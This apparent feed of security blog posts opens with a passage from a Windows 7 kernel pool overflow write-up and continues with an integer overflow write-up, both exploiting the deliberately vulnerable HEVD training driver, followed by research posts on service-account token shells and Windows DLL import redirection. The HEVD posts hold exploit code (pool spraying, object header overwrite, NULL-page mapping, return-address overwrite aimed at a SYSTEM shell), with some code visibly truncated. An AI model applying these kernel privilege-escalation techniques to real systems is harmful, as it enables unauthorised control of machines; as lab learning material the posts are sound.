         +0x008 GenericExecute   : 0x120000
         +0x00c GenericAll       : 0x1f0003
      +0x01c ValidAccessMask  : 0x1f0003
      +0x020 RetainAccess     : 0
      +0x024 PoolType         : 0 ( NonPagedPool )
      +0x028 DefaultPagedPoolCharge : 0
      +0x02c DefaultNonPagedPoolCharge : 0x40
      +0x030 DumpProcedure    : (null) 
      +0x034 OpenProcedure    : (null) 
      +0x038 CloseProcedure   : (null) 
      +0x03c DeleteProcedure  : (null) 
      +0x040 ParseProcedure   : (null) 
      +0x044 SecurityProcedure : 0x82abad90 
      +0x048 QueryNameProcedure : (null) 
      +0x04c OkayToCloseProcedure : (null) 
   +0x078 TypeLock         : _EX_PUSH_LOCK
      +0x000 Locked           : 0y0
      +0x000 Waiting          : 0y0
      +0x000 Waking           : 0y0
      +0x000 MultipleShared   : 0y0
      +0x000 Shared           : 0y0000000000000000000000000000 (0)
      +0x000 Value            : 0
      +0x000 Ptr              : (null) 
   +0x07c Key              : 0x6e657645
   +0x080 CallbackList     : _LIST_ENTRY [ 0x850535a0 - 0x850535a0 ]
      +0x000 Flink            : 0x850535a0 
      +0x004 Blink            : 0x850535a0 

Using -b option here really saves us because it displays all levels of sub-structures within their parent structures. So, we absolutely have honed in on the pointer to Event objects as evidenced by this:

+0x008 Name             : _UNICODE_STRING "Event"

What gets cool here, is that at offset 0x28 we see the TypeInfo structure. One of it’s members, the CloseProcedure is 0x38 deep into that TypeInfo structure. So starting from offset 0x0 of the data referenced by the OBJECT_TYPE pointer we found in the table, the CloseProcedure is located at offset 0x28 + 0x38, or 0x60. THIS is the function pointer that is called when use CloseHandle API to free these Event Objects from the non-paged pool. So this is our target.

If that is complicated I’ve tried to create a helpful diagram:

So what happens when we free the chunk with CloseHandle is the kernel goes to the address referenced by the array index value 0xc and looks at offset 0x60 from there for a function pointer and calls the function. Looking back at that table:

kd> dd nt!ObTypeIndexTable
82997760  00000000 bad0b0b0 84f46728 84f46660

The first function pointer is 0x00000000 and we already know from our NULL pointer dereference exploit that we can map the NULL page on Windows 7 x86. So thanks to the aforementioned bloggers, our path forward is clear. We’ll ONLY corrupt the value 0xc inside the OBJECT_HEADER so that it’s set to 0x0 instead. We’ll leave everything else the way it is with our overwrite. This way, when we free this chunk, the kernel will start looking for offset 0x60 for a function pointer from 0x00000000. So we’ll just map the NULL page and place a pointer to our shellcode at offset 0x60.

Executing The Plan

Now that we know our plan of attack, we need to execute it.

The adjustment we need to make is to poke holes in this contiguous block so that when we get our buffer allocated the allocator slides it right between Event Objects. We know that it takes 8 Event Objects being freed to make a 0x200-sized hole, so following along with @FuzzySec, we’ll release 8 Event Object handles every 0x16 handles in our vector. Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";

    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";

    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x200 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i = i + 0x16) {
        for (int x = 0; x < 8; x++) {
            BOOL freed = CloseHandle(sequential_handles[i + x]);
            if (freed == false) {
                cout << "[!] Unable to free sequential allocation!\n";
                cout << "[!] Last error: " << GetLastError() << "\n";
    cout << "[>] Holes poked lol.\n";

void send_payload(HANDLE hFile) {
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";


int main() {

    HANDLE hFile = grab_handle();



    return 0;

After running it and looking up our post memcpy kernel buffer with the !pool command, we see that our 0x200 byte object was allocated precisely between two Event Objects! Everything is working as planned!

kd> !pool 862740c8
Pool page 862740c8 region is Nonpaged pool
 86274000 size:   40 previous size:    0  (Allocated)  Even (Protected)
 86274040 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274080 size:   40 previous size:   40  (Allocated)  Even (Protected)
*862740c0 size:  200 previous size:   40  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 862742c0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862743c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862744c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862745c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274640 size:  200 previous size:   40  (Free)       Even
 86274840 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862748c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862749c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274ac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274bc0 size:  200 previous size:   40  (Free)       Even
 86274dc0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274e00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274e40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274e80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274ec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274fc0 size:   40 previous size:   40  (Allocated)  Even (Protected)

Memory Corruption Engaged

Now that we can control the pool to a predictable degree, it’s time to overwrite that type index and change it from 0xc to 0x0. Everything else in between our 0x200 allocation and this byte need to remain the same or we’ll get a BSOD.

Let’s just use the dd command to dump 32 DWORD values from the beginning of the Event Objects right after our kernel buffer real quick. repaste in here the memory pane view of an Event Object, and you can see how I formulate the input buff in the exploit code.

kd> dd 8627e780 
8627e780  04080040 ee657645 00000000 00000040
8627e790  00000000 00000000 00000001 00000001
8627e7a0  00000000 0008000c 8637f940 00000000

Right. So we need to keep everything but the starred 0xc intact and overwrite this single byte with 0x0. Looks like we’re overwriting 40 bytes in total or 0x28, which gives us an input buffer size of 0x220. We’ll make an overwrite_payload variable that is a byte buffer and well copy it into the last 0x28 bytes of a 0x220 sized buffer with our original \x42 values taking up the first 0x1F8 bytes as follows:

 ULONG payload_len = 0x220;

    BYTE* input_buff = (BYTE*)VirtualAlloc(NULL,
        payload_len + 0x1,

    BYTE overwrite_payload[] = (
        "\x40\x00\x08\x04"  // pool header
        "\x45\x76\x65\xee"  // pool tag
        "\x00\x00\x00\x00"  // obj header quota begin
        "\x00\x00\x00\x00"  // obj header quota end
        "\x01\x00\x00\x00"  // obj header begin
        "\x00\x00\x08\x00" // 0xc converted to 0x0

    memset(input_buff, '\x42', 0x1F8);
    memcpy(input_buff + 0x1F8, overwrite_payload, 0x28)

We’ll also want to allocate the NULL page which I pulled directly from tekwizzz123.

void allocate_shellcode() {

    _NtAllocateVirtualMemory NtAllocateVirtualMemory = 

    INT64 address = 0x1;
    int size = 0x100;

    HANDLE result = (HANDLE)NtAllocateVirtualMemory(

    if (result == INVALID_HANDLE_VALUE) {
        cout << "[!] Unable to allocate NULL\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
    cout << "[>] NULL page mapped.\n";
    cout << "[>] Putting 'AAAA' on NULL page...\n";

    memset((void*)0x0, '\x41', 0x100);


I’ll also fill the NULL page with pure \x41 values so that we should run this code and get an Access Violation exception with an eip value of 41414141.

Last but not least, we have to free our chunks so that the CloseProcedure is activated!

void free_chunks() {

    cout << "[>] Freeing defragmentation allocations...\n";
    for (int i = 0; i < defragment_handles.size(); i++) {

        BOOL freed = CloseHandle(defragment_handles[i]);
        if (freed == false) {
            cout << "[!] Unable to free defragment allocation!\n";
            cout << "[!] Last error: " << GetLastError() << "\n";
    cout << "[>] Defragmentation allocations freed.\n";
    cout << "[>] Freeing sequential allocations...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {

        BOOL freed = CloseHandle(sequential_handles[i]);
        if (freed == false) {
            cout << "[!] Unable to free defragment allocation!\n";
            cout << "[!] Last error: " << GetLastError() << "\n";
    cout << "[>] Sequential allocations freed.\n";

We run this code and what happens??

Access violation - code c0000005 (!!! second chance !!!)
41414141 ??              ???

We did it!!

You can examine the pool allocations too. Look at pool allocation right after our kernel buffer. We’ve replaced 0xc with 0x0 and you can see how it differs from the next Event Object as I’ve marked them with asteriks.

855b8af8 42 42 42 42 42 42 42 42 40 00 08 04 45 76 65 ee  [email protected].
855b8b08 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00  ....@...........
855b8b18 01 00 00 00 01 00 00 00 00 00 00 00 *00* 00 08 00  ................
855b8b28 80 82 14 85 00 00 00 00 01 00 04 00 00 00 00 00  ................
855b8b38 38 8b 5b 85 38 8b 5b 85 08 00 08 04 45 76 65 ee  8.[.8.[.....Eve.
855b8b48 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00  ....@...........
855b8b58 01 00 00 00 01 00 00 00 00 00 00 00 *0c* 00 08 00  ................

Now let’s just allocate some shellcode there…

Shellcode Implementation

We’re going to first use our shellcode from our Uninit Stack Variable exploit and see how far that gets us:

char Shellcode[] = (

These are my breakpoints right now:

kd> bp !HEVD+4D64
kd> ba r1 0x60
kd> bl
 0 e 8c295d64     0001 (0001) HEVD!TriggerNonPagedPoolOverflow+0xe6
 1 e 00000060 r 1 0001 (0001) 

Here is the disassembly pane after we hit our access breakpoint a few times (remember that that address will be accessed multiple times during our exploit). You can see we’re calling a function located at edi + 0x60 when edi is set to 0. So, this is our shellcode we’re about to run:

Here is the call stack:

We can see in the memory pane that we’re pushing 4 DWORDs onto the stack setting up our call to dword ptr [esp+0x60] which we would need to clean up in our subroutine (shellcode). So our shellcode will end with a ret 0x10 instruction to compensate.

Getting an nt authority/system shell »>

Full exploit code: here


That was a really fun one. Thanks again to the aforementioned authors and exploit writers. Even though this exploit vector involved some relatively old techniques, it was still fun for me and I learned a lot just about memory management in general and got some more experience in WinDBG. Until next time!

HEVD Exploits – Windows 7 x86 Integer Overflow

By: h0mbre
20 April 2020 at 04:00


Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.


Thanks to @tekwizz123, I used his method of setting up the exploit buffer for the most part as the Windows macros I was using weren’t working (obviously user error.)

Integer Overflow

This was a really interesting bug to me. Generically, the bug is when you have some arithmetic in your code that allows for unintended behavior. The bug in question here involved incrementing a DWORD value that was set 0xFFFFFFFF which overflows the integer size and wraps the value around back to 0x00000000. If you add 0x4 to 0xFFFFFFFF, you get 0x100000003. However, this value is now over 8 bytes in length, so we lose the leading 1 and we’re back down to 0x00000003. Here is a small demo program:

#include <iostream>
#include <Windows.h>

int main() {

	DWORD var2 = var1 + 0x4;

	std::cout << ">> Variable One is: " << std::hex << var1 << "\n";
	std::cout << ">> Variable Two is: " << std::hex << var2 << "\n";

Here is the output:

>> Variable One is: ffffffff
>> Variable Two is: 3

I actually learned about this concept from Gynvael Coldwind’s stream on fuzzing. I also found the bug in my own code for an exploit on a real vulnerability I will hopefully be doing a write-up for soon (when the CVE gets published.) Now that we know how the bug occurs, let’s go find the bug in the driver in IDA and figure out how we can take advantage.

Reversing the Function

With the benefit of the comments I made in IDA, we can kind of see how this works. I’ve annotated where everything is after stepping through in WinDBG.

The first thing we notice here is that ebx gets loaded with the length of our input buffer in DeviceIoControl when we do this operation here: move ebx, [ebp+Size]. This is kind of obvious, but I hadn’t really given it much thought before. We allocate an input buffer in our code, usually its a character or byte array, and then we usually satisfy the DWORD nInBufferSize parameter by doing something like sizeof(input_buffer) or sizeof(input_buffer) - 1 because we actually want it to be accurate. Later, we might actually lie a little bit here.

Now that ebx is the length of our input buffer, we see that it gets +4 added to it and then loaded into to eax. If we had an input buffer of 0x7FC, adding 0x4 to it would make it 0x800. A really important thing to note here is that we’ve essentially created a new length variable in eax and kept our old one in ebx intact. In this case, eax would be 0x800 and ebx would still hold 0x7FC.

Next, eax is compared to esi which we can see holds 0x800. If the eax is equal to or more than 0x800, we can see that take the red path down to the Invalid UserBuffer Size debug message. We don’t want that. We need to satisfy this jbe condition.

If we satisfy the jbe condition, we branch down to loc_149A5. We put our buffer length from ebx into eax and then we effectively divide it by 4 since we do a bit shift right of 2. We compare this to quotient to edi which was zeroed out previously and has remained up until now unchanged. If length/4 quotient is the same or more than the counter, we move to loc_149F1 where we will end up exiting the function soon after. Right now, since our length is more than edi, we’ll jump to mov eax, [ebp+8].

This series of operations is actually the interesting part. eax is given a pointer to our input buffer and we compare the value there with 0BAD0B0B0. If they are the same value, we move towards exiting the function. So, so far we have identified two conditions where we’ll exit the function: if edi is ever equal to or more than the length of our input buffer divided by 4 OR if the 4 byte value located at [ebp+8] is equal to 0BAD0B0B0.

Let’s move on to the final puzzle piece. mov [ebp+edi*4+KernelBuffer], eax is kind of convoluted looking but what it’s doing is placing the 4 byte value in eax into the kernel buffer at index edi * 0x4. Right now, edi is 0, so it’s placing the 4 byte value right at the beginning of the kernel buffer. After this, the dword ptr value at ebp+8 is incremented by 0x4. This is interesting because we already know that ebp+0x8 is where the pointer is to our input buffer. So now that we’ve placed the first four bytes from our input buffer into the kernel buffer, we move now to the next 4 bytes. We see also that edi incremented and we now understand what is taking place.

As long as:

  1. the length of our buffer + 4 is < 0x800,
  2. the Counter variable (edi) is < the length of our buffer divided by 4,
  3. and the 4 byte value in eax is not 0BAD0B0B0,

we will copy 4 bytes of our input buffer into the kernel buffer and then move onto the next 4 bytes in the input buffer to test criteria 2 and 3 again.

There can’t really be a problem with copying bytes from the user buffer into the kernel buffer unless somehow the copying exceeds the space allocated in the kernel buffer. If that occurs, we’ll begin overwriting adjacent memory with our user buffer. How can we fool this length + 0x4 check?

Manipulating DWORD nInBufferSize

First we’ll send a vanilla payload to test our theories up to this point. Let’s start by sending a buffer full of all \x41 chars and it will be a length of 0x750 (null-terminated). We’ll use the sizeof() - 1 method to form our nInBufferSize parameter and account for the null terminator as well so that everything is accurate and consistent. Our code will look like this at this point:

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;

void send_payload(HANDLE hFile) {


    BYTE input_buff[0x751] = { 0 };

    // 'A' * 1871

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) - 1  << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        sizeof(input_buff) - 1,

    if (!result) {
        cout << "[!] Payload failed.\n";

int main()
    HANDLE hFile = get_handle();


What are our predictions for this code? What conditions will we hit? The criteria for copying bytes from user buffer to kernel buffer was:

  1. the length of our buffer + 4 is < 0x800,
  2. the Counter variable (edi) is < the length of our buffer divided by 4,
  3. and the 4 byte value in eax is not 0BAD0B0B0

We should pass the first check since our buffer is indeed small enough. This second check will eventually make us exit the function since our length divided by 4, will eventually be caught by the Counter as it increments every 4 byte copy. We don’t have to worry about the third check as we don’t have this string in our payload. Let’s send it and step through it in WinDBG.

This picture helps us a lot. I’ve set a breakpoint on the comparison between the length of our buffer + 4 and 0x800. As you can see, eax holds 0x754 which is what we would expect since we sent a 0x750 byte buffer.

In the bottom right, we our user buffer was allocated at 0x0012f184. Let’s set a break on access at 0x0012f8d0 since that is 0x74c away from where we are now, which is 0x4 short of 0x750. If this 4 byte address is accessed for a read-operation we should hit our breakpoint. This will occur when the program goes to copy the 4 byte value here to the kernel buffer.

The syntax is ba r1 0x0012f8d0 which means “break on access if there is a read of at least 1 byte at that address.”

We resume from here, we hit our breakpoint.

Take a look at edi, we can see our counter has incremented 0x1d3 times at this point, which is very close to the length of our buffer (0x750) divided by 0x4 (0x1d4). We can see that right now, we’re doing a comparison on the 4 byte value at this address to ecx or bad0b0b0. We won’t hit that criteria but on the next iteration, our counter will be == to 0x1d4 and thus, we will be finished copying bytes into the kernel buffer. Everything worked as expected. Now let’s send a fake DWORD nInBufferSize value of 0xFFFFFFFF and watch us sail right through length check and see what else we bypass.

Our DeviceIoControl call now looks like this:

int result = DeviceIoControl(hFile,

When we hit a breakpoint at the point where we see eax being loaded with our user buffer length + 0x4, we see that right before the arithmetic, we are at a length of 0xffffffff in ebx.

Then after the operation, we see eax rolls over to 0x3.

So we will pass the length check now for sure, which we saw coming, the other really interesting thing that we took note of previously but can see playing out here is that ebx has been left undisturbed and is at 0xffffffff still. This is the register used in the arithmetic to determine whether or not the Counter should keep iterating or not. This value is eventually loaded into eax and divided by 4!. 0xfffffffff divided by 4 will likely never cause us to exit the function. We will keep copying bytes from the user buffer to the kernel buffer basically forever now.


Overwriting arbitrary memory in the kernel space is dangerous business. We can’t corrupt anything more than we absolutely have to. We need a way to terminate the copying function. In comes the terminator string of 0BAD0B0B0 to the rescue. If the 4 byte value in the user buffer is 0BAD0B0B0, we cease copying and exit the function. Obviously we BSOD here.

So hopefully, we can copy 0x800 bytes, and then start overwriting kernel memory on the stack where we can strategically place a pointer to shellcode. Like I said previously, you don’t want a huge overwrite here. I started at 0x800 and worked my way up 4 bytes at a time using a little pattern creating tool I made here until I got a crash.

Incrementing 4 bytes at a time I finally got a crash with a 0x830 buffer length where the last 4 bytes are 0BAD0B0B0.

Getting a Crash

After incrementing methodically from a buffer size of 0x800, and remember that this includes a 4 byte terminator string or else we’ll never stop copying into kernel space and BSOD the host, I finally got an exception that tried to execute code at 41414141 with a total buffer size of 0x830. (I also got an exception when I used a smaller buffer size of 0x82C but the address referenced was a NULL). In this buffer, I had 0x82C \x41 chars and then our terminator. So I figured our offset was going to be at 0x828 or 2088 in decimal, but just to make sure I used my pattern python script to get the exact offset.

root@kali:~# python3 -c 2092 -cpp
char pattern[] = 

I then added the terminator to the end like so.


And we see I got an access violation at 306f4c30.

Using pattern again, I got the exact offset and we confirmed our suspicions.

root@kali:~# python3 -o 306f4c30
Exact offset found at position: 2088

From here on out, this plays out just like stack buffer overflow post, so please reference those posts if you have any questions! We initialize our shellcode, create a RWX buffer for it, move it there, and then use the address of the buffer to overwrite eip at that offset we found.

Final Code

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;

void send_payload(HANDLE hFile) {

    char shellcode[] = (

    LPVOID shellcode_address = VirtualAlloc(NULL,

    memcpy(shellcode_address, shellcode, sizeof(shellcode));

    cout << "[>] RWX shellcode allocated at: " << hex << shellcode_address
        << "\n";

    BYTE input_buff[0x830] = { 0 };

    // 'A' * 0x828
    memset(input_buff, '\x41', 0x828);

    memcpy(input_buff + 0x828, &shellcode_address, 0x4);

    BYTE terminator[] = "\xb0\xb0\xd0\xba";

    memcpy(input_buff + 0x82c, &terminator, 0x4);

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,

    if (!result) {
        cout << "[!] Payload failed.\n";

void spawn_shell()
    STARTUPINFOA Startup_Info;
    Startup_Info.cb = sizeof(Startup_Info);


int main()
    HANDLE hFile = get_handle();




This should net you a system shell.

Getting an Interactive Service Account Shell

By: tiraniddo
9 February 2020 at 23:21
Sometimes you want to manually interact with a shell running a service account. Getting a working interactive shell for SYSTEM is pretty easy. As an administrator, pick a process with an appropriate access token running as SYSTEM (say services.exe) and spawn a child process using that as the parent. As long as you specify an interactive desktop, e.g. WinSta0\Default, then the new process will be automatically assigned to the current session and you'll get a visible window.

To make this even easier, NtObjectManager implements the Start-Win32ChildProcess command, which works like the following:

PS> $p = Start-Win32ChildProcess powershell

And you'll now see a console window with a copy of PowerShell. What if you want to instead spawn Local Service or Network Service? You can try the following:

PS> $user = Get-NtSid -KnownSid LocalService
PS> $p = Start-Win32ChildProcess powershell -User $user

The process starts, however you'll find it immediately dies:

PS> $p.ExitNtStatus

The error code, STATUS_DLL_INIT_FAILED, basically means something during initialization failed. Tracking this down is a pain in the backside, especially as the failure happens before a debugger such as WinDBG typically gets control over the process. You can enable the Create Process event filter, but you still have to track down why it fails.

I'll save you the pain, the problem with running an interactive service process is the Local Service/Network Service token doesn't have access to the Desktop/Window Station/BaseNamedObjects etc for the session. It works for SYSTEM as that account is almost always granted full access to everything by virtue of either the SYSTEM or Administrators SID, however the low-privileged service accounts are not.

One way of getting around this would be to find every possible secured resource and add the service account. That's not really very reliable, miss one resource and it might still not work or it might fail at some indeterminate time. Instead we do what the OS does, we need to create the service token with the Logon Session SID which will grant us access to the session's resources.

First create a SYSTEM powershell command on the current desktop using the Start-Win32ChildProcess command. Next get the current session token with:

PS>  $sess = Get-NtToken -Session

We can print out the Logon Session SID now, for interest:

PS> $sess.LogonSid.Sid
Name                                     Sid
----                                     ---
NT AUTHORITY\LogonSessionId_0_41106165   S-1-5-5-0-41106165

Now create a Local Service token (or Network Service, or IUser, or any service account) using:

PS> $token = Get-NtToken -Service LocalService -AdditionalGroups $sess.LogonSid.Sid

You can now create an interactive process on the current desktop using:

PS> New-Win32Process cmd -Token $token -CreationFlags NewConsole

You should find it now works :-)

A command prompt, running whois and showing the use as Local Service.

DLL Import Redirection in Windows 10 1909

By: tiraniddo
8 February 2020 at 16:47
While poking around in NTDLL the other day for some Chrome work I noticed an interesting sounding new feature, Import Redirection. As far as I can tell this was introduced in Windows 10 1809, although I'm testing this on 1909.

What piqued my interesting was during initialization I saw the following code being called:

NTSTATUS LdrpInitializeImportRedirection() {
    PUNICODE_STRING RedirectionDllName =     
    if (RedirectionDllName->Length) {
        PVOID Dll;
        NTSTATUS status = LdrpLoadDll(RedirectionDllName, 0x1000001, &Dll);
        if (NT_SUCCESS(status)) {
        // ...


The code was extracting a UNICODE_STRING from the RTL_USER_PROCESS_PARAMETERS block then passing it to LdrpLoadDll to load it as a library. This looked very much like a supported mechanism to inject a DLL at startup time. Sounds like a bad idea to me. Based on the name it also sounds like it supports redirecting imports, which really sounds like a bad idea.

Of course it’s possible this feature is mediated by the kernel. Most of the time RTL_USER_PROCESS_PARAMETERS is passed verbatim during the call to NtCreateUserProcess, it’s possible that the kernel will sanitize the RedirectionDllName value and only allow its use from a privileged process. I went digging to try and find who was setting the value, the obvious candidate is CreateProcessInternal in KERNELBASE. There I found the following code:

BOOL CreateProcessInternalW(...) {
    LPWSTR RedirectionDllName = NULL;
    if (!PackageBreakaway) {
        BasepAppXExtension(PackageName, &RedirectionDllName, ...);

    BasepCreateProcessParameters(&Params, ...);
    if (RedirectionDllName) {
        RtlInitUnicodeString(&Params->RedirectionDllName, RedirectionDllName);

    // ...


The value of RedirectionDllName is being retrieved from BasepAppXExtension which is used to get the configuration for packaged apps, such as those using Desktop Bridge. This made it likely it was a feature designed only for use with such applications. Every packaged application needs an XML manifest file, and the SDK comes with the full schema, therefore if it’s an exposed option it’ll be referenced in the schema.

Searching for related terms I found the following inside UapManifestSchema_v7.xsd:

<xs:element name="Properties">
      <xs:element name="ImportRedirectionTable" type="t:ST_DllFile" 

This fits exactly with what I was looking for. Specifically the Schema type is ST_DllFile which defined the allowed path component for a package relative DLL. Searching MSDN for the ImportRedirectionTable manifest value brought me to this link. Interestingly though this was the only documentation. At least on MSDN I couldn’t seem to find any further reference to it, maybe my Googlefu wasn’t working correctly. However I did find a Stack Overflow answer, from a Microsoft employee no less, documenting it *shrug*. If anyone knows where the real documentation is let me know.

With the SO answer I know how to implement it inside my own DLL. I need to define list of REDIRECTION_FUNCTION_DESCRIPTOR structures which define which function imports I want to redirect and the implementation of the forwarder function. The list is then exported from the DLL through a REDIRECTION_DESCRIPTOR structure as   __RedirectionInformation__. For example the following will redirect CreateProcessW and always return FALSE (while printing a passive aggressive statement):

BOOL WINAPI CreateProcessWForwarder(
    LPCWSTR lpApplicationName,
    LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCWSTR lpCurrentDirectory,
    LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation)
    printf("No, I'm not running %ls\n", lpCommandLine);
    return FALSE;

    { "api-ms-win-core-processthreads-l1-1-0.dll", "CreateProcessW"
                  &CreateProcessWForwarder },

extern "C" __declspec(dllexport) const REDIRECTION_DESCRIPTOR __RedirectionInformation__ =


I compiled the DLL, added it to a packaged application, added the ImportRedirectionTable Manifest value and tried it out. It worked! This seems a perfect feature for something like Chrome as it’s allows us to use a supported mechanism to hook imported functions without implementing hooks on NtMapViewOfSection and things like that. There are some limitations, it seems to not always redirect imports you think it should. This might be related to the mention in the SO answer that it only redirects imports directly in your applications dependency graph and doesn’t support GetProcAddress. But you could probably live with that,

However, to be useful in Chrome it obviously has to work outside of a packaged application. One obvious limitation is there doesn’t seem to be a way of specifying this redirection DLL if the application is not packaged. Microsoft could support this using a new Process Thread Attribute, however I’d expect the potential for abuse means they’d not be desperate to do so.

The initial code doesn’t seem to do any checking for the packaged application state, so at the very least we should be able to set the RedirectionDllName value and create the process manually using NtCreateUserProcess. The problem was when I did the process initialization failed with STATUS_INVALID_IMAGE_HASH. This would indicate a check was made to verify the signing level of the DLL and it failed to load.

Trying with any Microsoft signed binary instead I got STATUS_PROCEDURE_NOT_FOUND which would imply the DLL loaded but obviously the DLL I picked didn't export __RedirectionInformation__. Trying a final time with a non-Microsoft, but signed binary I got back to STATUS_INVALID_IMAGE_HASH again. It seems that outside of a packaged application we can only use Microsoft signed binaries. That’s a shame, but oh well, it was somewhat inconvenient to use anyway.

Before I go there are two further undocumented functions (AFAIK) the DLL can export.

BOOL __ShouldApplyRedirection__(LPWSTR DllName)

If this function is exported, you can disable redirection for individual DLLs based on the DllName parameter by returning FALSE.

BOOL __ShouldApplyRedirectionToFunction__(LPWSTR DllName, DWORD Index)

This function allows you to disable redirection for a specific import on a DLL. Index is the offset into the redirection table for the matched import, so you can disable redirection for certain imports for certain DLLs.

In conclusion, this is an interesting feature Microsoft added to Windows to support a niche edge case, and then seems to have not officially documented it. Nice! However, it doesn’t look like it’s useful for general purpose import redirection as normal applications require the file to be signed by Microsoft, presumably to prevent this being abused by malicious code. Also there's no trivial way to specify the option using CreateProcess and calling NtCreateUserProcess doesn't correctly initialize things like SxS and CSRSS connections.


